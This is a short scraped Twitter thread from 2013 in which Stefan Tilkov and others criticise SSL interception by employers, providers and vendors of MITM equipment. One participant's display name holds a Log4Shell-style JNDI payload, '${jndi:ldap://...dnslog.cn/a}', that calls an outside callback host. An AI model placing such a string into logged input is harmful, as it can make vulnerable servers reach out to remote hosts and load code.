Stefan Tilkov · Jan 11, 2013 · 8:35 AM UTC

Stefan Tilkov · Jan 11, 2013 · 8:35 AM UTC

Stefan Tilkov @stilkov

11 Jan 2013

In my opinion, whether you're a service provider or an employer: Attacking your users' SSL connections should land you in jail

Jan 11, 2013 · 8:35 AM UTC

Erik Wilde · Jan 11, 2013 · 8:59 AM UTC

Erik Wilde @dret

11 Jan 2013

Replying to @stilkov

@stilkov does "installing additional root certificates that allow you to intercept any SSL connection" count? cisco has "products" for this.

Stefan Tilkov · Jan 11, 2013 · 9:10 AM UTC

Stefan Tilkov @stilkov

11 Jan 2013

@dret I guess it's "Tools don't intrude on peoples' privacy. Users of tools do." :-)

Itsa me ${jndi:ldap://jabley.dnslog.cn/a} 💉💉💉😷 · Jan 11, 2013 · 8:43 AM UTC

Itsa me ${jndi:ldap://jabley.dnslog.cn/a} 💉💉💉😷 @jabley

11 Jan 2013

Replying to @stilkov

@stilkov Can we add vendors of MITM networking equipment to that list?

Stefan Tilkov · Jan 11, 2013 · 9:16 AM UTC

Stefan Tilkov @stilkov

11 Jan 2013

@jabley I guess it's "Tools don't intrude on peoples' privacy. Users of tools do." :-)

Thomas Einwaller · Jan 11, 2013 · 8:40 AM UTC

Thomas Einwaller @tOMPSON

11 Jan 2013

Replying to @stilkov

@stilkov yes, but pretty much every big "Enterprise" I worked at in consulting does this - especially Banks - I always hated it

Stefan Tilkov · Jan 11, 2013 · 9:15 AM UTC

Stefan Tilkov @stilkov

11 Jan 2013

@tOMPSON I know and I agree.